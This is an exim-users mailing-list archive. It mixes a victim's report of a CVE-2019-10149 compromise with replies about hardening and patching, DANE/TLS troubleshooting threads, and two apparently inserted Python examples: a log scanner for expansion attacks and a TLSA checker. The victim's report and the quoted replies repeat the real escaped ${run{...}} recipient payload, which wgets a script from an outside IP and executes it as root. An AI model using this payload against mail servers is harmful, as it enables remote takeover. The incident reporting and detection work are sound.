Re: [exim] just been hacked, could be CVE-2019-10149?
On 11.06.19 at 08:27, Odhiambo Washington via Exim-users wrote:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
> exim-users@exim.org> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>>
>> The reasons I suspect exim involvement:
>>
>> • starting today, every 5 mins getting frozen messages:
>>
>> The following address(es) have yet to be delivered:
>>
>>
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>>
>>

I checked the server I did the restricted chars change for and this is the result:

2019-06-10 04:31:04 H=(xx.de) [89.248.171.57] F=<> rejected RCPT : Restricted characters in address

\o/ Success ! :D

This attack was presented to you by... the Seychelles Islands.

best regards,
Marius

--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] just been hacked, could be CVE-2019-10149?
You got it. Why didn't you harden your exim with the "allowed chars" change we posted here on the list, or did you?

On 11 June 2019 02:10:40 CEST, Calum Mackay via Exim-users wrote:
>hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE-2019-10149? I don't see any reports of active exploits
>yet.
>
>The reasons I suspect exim involvement:
>
>• starting today, every 5 mins getting frozen messages:
>
>The following address(es) have yet to be delivered:
>
>root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
>Too many "Received" headers - suspected mail loop
>
>• the trojan horse scripts, that were successfully installed on my
>system, with root access, are all group Debian-exim
>
>
>Luckily, it looks like the trojans did nothing more than repeated
>attempts to open up my ssh server to root logins, which I think (and
>hope) didn't actually work, so I may have been lucky, and the damage
>isn't widespread.
>
>
>ought I to be reporting this anywhere?
>
>
>thanks,
>calum.

--
This message was sent from my Android device with K-9 Mail.
Re: [exim] just been hacked, could be CVE-2019-10149?
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
exim-users@exim.org> wrote:

> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>

Whom would you like to report to?? :-)

All vulnerable versions of Exim had a patch released several days ago. We hope you either applied the patch, or updated to 4.92. If you did none of those, you are on your own, my fren!

--
Best regards,
Odhiambo WASHINGTON,
Nairobi, KE
+254 7 3200 0004/+254 7 2274 3223
"Oh, the cruft.", grep ^[^#] :-)
Re: [exim] A TLS fatal alert has been received.: Insufficient security
Viktor Dukhovni via Exim-users writes

> The gmx.de MTAs support DANE in both directions. Does your MX host
> have published DANE TLSA records? Are they correct? Is your
> certificate still valid, or expired? ...

I have an issue that has a similar feel to it. It's with a host of Germanic providers gmx.de, gmx.at, web.de, mailbox.org ...

2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection to mx-ha03.web.de [212.227.15.17]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query.
2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection to mx-ha02.web.de [212.227.17.8]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query.
2019-03-25 09:00:08 1h8LSh-0001oy-Uy == user_1_redac...@web.de R=dnslookup T=remote_smtp defer (-37) H=mx-ha02.web.de [212.227.17.8]: TLS session: (certificate verification failed): TLSA record problem: There was error initializing the DNS query.
2019-03-25 09:22:27 1h8LSp-00020w-Qe DANE attempt failed; TLS connection to mx-ha02.web.de [212.227.17.8]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query.
2019-03-25 09:22:27 1h8LSp-00020w-Qe == user_2_redac...@web.de R=dnslookup T=remote_smtp defer (-37) H=mx-ha02.web.de [212.227.17.8]:

I am at a loss since that time. I have lost all my subscribers based at these domains. I was thinking that I may have to set up secure DNS to continue email.

> It would be helpful to post your email domainname and server hostname.

The sending domain is nep.repec.org, the server is at 5.9.150.131, 2a01:4f8:190:3385::2.

--
Cheers,
Thomas Krichel http://openlib.org/home/krichel
skype:thomaskrichel
[exim] just been hacked, could be CVE-2019-10149?
hi all,

My mail system has just been hacked; it's running Debian unstable exim 4.91-9

Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

The reasons I suspect exim involvement:

• starting today, every 5 mins getting frozen messages:

The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
Too many "Received" headers - suspected mail loop

• the trojan horse scripts, that were successfully installed on my system, with root access, are all group Debian-exim

Luckily, it looks like the trojans did nothing more than repeated attempts to open up my ssh server to root logins, which I think (and hope) didn't actually work, so I may have been lucky, and the damage isn't widespread.

ought I to be reporting this anywhere?

thanks,
calum.
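The two log-side signs of this attack that the thread shows, Calum's frozen message whose recipient local part is an Exim "${run{...}}" expansion written with \xNN escapes, and Marius's "rejected RCPT ... Restricted characters in address" line from a hardened server, can be checked for across a mainlog or rejectlog with a small scanner. The following is an added example in Python, not code from this thread or from Exim; the sample log lines, host names, TEST-NET addresses and the harmless /bin/true payload are constructed for the example, and the log line layouts are assumed to follow Exim's usual "rejected RCPT <addr>: message" and "== addr R=... T=... defer" forms.

```python
import re

# Exim string-expansion syntax. A genuine recipient local part never needs
# "${"; the address Calum quotes carries "${run{...}}" in exactly that spot.
EXPANSION_RE = re.compile(r"\$\{")
# \xNN escapes as used in that address, so that the expansion receives the
# decoded bytes. Decoding them lets an analyst read what was attempted.
HEX_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# A whitespace-separated address token in a log line, with optional <...>.
ADDR_TOKEN_RE = re.compile(r"<?([^\s<>]+@[^\s<>:]+)>?")


def decode_hex_escapes(text):
    """Replace every \\xNN escape with the character it denotes."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def local_part(address):
    """Split off the domain; rpartition keeps any '@' inside the local part."""
    local, sep, _domain = address.rpartition("@")
    return local if sep else address


def expansion_attempt(address):
    """Return the decoded local part if it carries expansion syntax, else None."""
    local = local_part(address)
    decoded = decode_hex_escapes(local)
    if EXPANSION_RE.search(local) or EXPANSION_RE.search(decoded):
        return decoded
    return None


def scan_exim_log(lines):
    """Return (line number, raw address, decoded local part) for each hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        for address in ADDR_TOKEN_RE.findall(line):
            decoded = expansion_attempt(address)
            if decoded is not None:
                findings.append((number, address, decoded))
    return findings


# Constructed sample log lines (hypothetical hosts, TEST-NET addresses and a
# harmless /bin/true in place of any real payload). Raw strings keep the \x
# escapes literal, as Exim writes them to its log.
SAMPLE_LOG = [
    r"2019-06-10 04:31:04 H=(mail.example.net) [192.0.2.10] F=<> rejected RCPT "
    r"<root+${run{\x2fbin\x2ftrue}}@example.com>: Restricted characters in address",
    r"2019-06-10 04:32:10 1hZzzz-000001-AB <= alice@example.org H=mail.example.org "
    r"[192.0.2.20] P=esmtps S=1234 for bob@example.com",
    r"2019-06-10 04:33:00 1hZzzz-000002-CD == root+${run{\x2fbin\x2ftrue}}@example.com "
    r"R=localuser T=local_delivery defer (-1): frozen",
]

if __name__ == "__main__":
    for number, address, decoded in scan_exim_log(SAMPLE_LOG):
        print(f"line {number}: {address!r} -> local part decodes to {decoded!r}")
```

Both the rejected RCPT line (hardened server) and the frozen-delivery line (unhardened server) are flagged, while the ordinary delivery on line 2 is not. The scanner checks the local part both before and after decoding the escapes, so an address that spelled the braces themselves as \x24\x7b would still be caught; the decoded form is reported so the analyst can read the attempted command without running anything.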
Re: [exim] A TLS fatal alert has been received.: Insufficient security
On Mon, Jun 10, 2019 at 05:51:42PM +0200, Arno Thuber via Exim-users wrote:

> The thing is, that it as far as I can see only happens when receiving
> messages from the German mail provider GMX.

The gmx.de MTAs support DANE in both directions. Does your MX host have published DANE TLSA records? Are they correct? Is your certificate still valid, or expired? ... It would be helpful to post your email domainname and server hostname.

--
Viktor.
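Viktor's questions here, and the DANE failures Thomas reports against the web.de MX hosts earlier in this thread, come down to one check: does any published TLSA record match the certificate chain the MX actually presents? The following is an added example in Python of that comparison, not code from the list or from Exim. The DER and SubjectPublicKeyInfo bytes are constructed placeholders (in practice they come from the certificate the MX presents, e.g. via openssl x509 -outform DER and -pubkey); the matching follows RFC 6698, with the RFC 7672 rule that certificate usages 0 and 1 are not used for SMTP. Note that Thomas's log lines report the failure while initializing the DNS query for the TLSA record, so on his host the lookup stage fails before any comparison of this kind is reached.

```python
import hashlib

# TLSA matching types (RFC 6698 section 2.1.3): how the record data is compared
# with the selected part of a certificate.
MATCHING_TYPES = {
    0: lambda der: der,                           # Full: the DER bytes themselves
    1: lambda der: hashlib.sha256(der).digest(),  # SHA2-256
    2: lambda der: hashlib.sha512(der).digest(),  # SHA2-512
}


def parse_tlsa(rdata):
    """Parse the presentation form 'usage selector mtype hex...' of one record."""
    fields = rdata.split()
    if len(fields) < 4:
        raise ValueError(f"not a TLSA record: {rdata!r}")
    usage, selector, mtype = (int(f) for f in fields[:3])
    data = bytes.fromhex("".join(fields[3:]))  # dig may wrap the hex over tokens
    return usage, selector, mtype, data


def tlsa_record_matches(rdata, chain):
    """chain: list of (cert_der, spki_der) tuples, end-entity certificate first."""
    usage, selector, mtype, data = parse_tlsa(rdata)
    if usage not in (2, 3):
        return False  # PKIX-TA(0)/PKIX-EE(1) are not used for SMTP (RFC 7672)
    if selector not in (0, 1) or mtype not in MATCHING_TYPES:
        return False  # unknown parameters: unusable record, never a match
    # DANE-EE(3) names the server certificate itself; DANE-TA(2) names an
    # issuer that must appear in the presented chain.
    candidates = chain[:1] if usage == 3 else chain[1:]
    for cert_der, spki_der in candidates:
        presented = cert_der if selector == 0 else spki_der
        if MATCHING_TYPES[mtype](presented) == data:
            return True
    return False


def dane_status(records, chain):
    """What a DANE-capable SMTP client concludes for one MX host."""
    if not records:
        return "no TLSA records: DANE not attempted"
    if any(tlsa_record_matches(r, chain) for r in records):
        return "match: DANE verification succeeds"
    return "mismatch: no TLSA record covers the presented certificate chain"


# Constructed placeholders standing in for real DER bytes.
EE_CERT = b"constructed end-entity certificate DER placeholder"
EE_SPKI = b"constructed end-entity SubjectPublicKeyInfo placeholder"
CA_CERT = b"constructed issuer certificate DER placeholder"
CA_SPKI = b"constructed issuer SubjectPublicKeyInfo placeholder"
CHAIN = [(EE_CERT, EE_SPKI), (CA_CERT, CA_SPKI)]

CURRENT_RECORD = "3 1 1 " + hashlib.sha256(EE_SPKI).hexdigest()
# A record left over from the previous certificate: the rollover case.
STALE_RECORD = "3 1 1 " + hashlib.sha256(b"previous certificate's SPKI").hexdigest()
TA_RECORD = "2 0 1 " + hashlib.sha256(CA_CERT).hexdigest()

if __name__ == "__main__":
    print(dane_status([STALE_RECORD], CHAIN))
    print(dane_status([STALE_RECORD, CURRENT_RECORD], CHAIN))
    print(dane_status([TA_RECORD], CHAIN))
```

The stale-record case is the one Viktor's "still valid, or expired?" question points at: a certificate renewed without its "3 1 1" record being updated produces a mismatch even though the certificate itself is perfectly valid. Publishing the new record alongside the old one before the rollover, as the second call shows, keeps verification succeeding throughout.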
Re: [exim] A TLS fatal alert has been received.: Insufficient security
On 10/06/2019 16:51, Arno Thuber via Exim-users wrote:
> A TLS
> fatal alert has been received.: Insufficient security

You might need to ask on a gnutls mailinglist about this.

--
Cheers,
Jeremy
[exim] A TLS fatal alert has been received.: Insufficient security
Hello,

today I suddenly started to see log lines telling me "A TLS fatal alert has been received.: Insufficient security". The thing is, that it as far as I can see only happens when receiving messages from the German mail provider GMX. I can send messages to them, I also can send mails from GMX to my other accounts at other mail providers and transmission happens TLS encrypted (using the same ciphers). I also still receive mails over TLS encrypted links from other mail providers.

The interesting part of the communication is as follows:

gnutls_handshake was successful
TLS: checking peer certificate
TLS certificate verified: peerdn="C=DE,O=1&1 Mail & Media GmbH,ST=Rhineland-Palatinate,L=Montabaur,CN=mout.gmx.net"
cipher: TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256
Have channel bindings cached for possible auth usage.
TLS active
gnutls_record_recv(0x55de099705b0, 0x55de09d526d0, 4096)
GnuTLS<3>: ASSERT: record.c[record_add_to_buffers]:787
GnuTLS<3>: ASSERT: record.c[record_add_to_buffers]:794
GnuTLS<3>: ASSERT: record.c[_gnutls_recv_in_buffers]:1328
GnuTLS<3>: ASSERT: record.c[_gnutls_recv_int]:1473
tls_refill: err from gnutls_record_recv(
LOG: MAIN
  TLS error on connection from mout.gmx.net [212.227.17.22] (recv): A TLS fatal alert has been received.: Insufficient security
LOG: smtp_connection MAIN
  SMTP connection from mout.gmx.net [212.227.17.22] lost D=0s
child 4244 ended: status=0x100 normal exit, 1

I didn't update anything the last days. I'm using Exim 4.92-7~bpo9+1 from Debian with GnuTLS 3.5.8-5+deb9u4.

I had hopes I could learn from Marc Merlin's issue, but after some similarity for starters it seems to be something different and I'm at a loss.

Regards,
Arno
Re: [exim] TLS with gmail started failing
On 10/06/2019 11:12, Richard Jones via Exim-users wrote:
> I can't help with your problem, but could I ask specifically how you got
> such detailed logging and where it was logged?

exim -d-all+tls

stderr

--
Cheers,
Jeremy
Re: [exim] TLS with gmail started failing
On Jun 07, Exim Users wrote

> With more debug logs enabled, I see
> 14:32:02 5341 74.125.141.26 in hosts_avoid_tls? no (end of list)
> 14:32:02 5341 SMTP>> STARTTLS
> 14:32:02 5341 read response data: size=30
> 14:32:02 5341 SMTP<< 220 2.0.0 Ready to start TLS
> 14:32:02 5341 74.125.141.26 in hosts_require_ocsp? no (option unset)
> 14:32:02 5341 74.125.141.26 in hosts_request_ocsp? yes (matched "*")
> 14:32:02 5341 initialising GnuTLS as a client on fd 9
> 14:32:02 5341 GnuTLS global init required.
> 14:32:02 5341 initialising GnuTLS client session
> 14:32:02 5341 Expanding various TLS configuration options for session
> credentials.

Hi,

I can't help with your problem, but could I ask specifically how you got such detailed logging and where it was logged?

Thanks,
Richard

--
junix.systems/privacy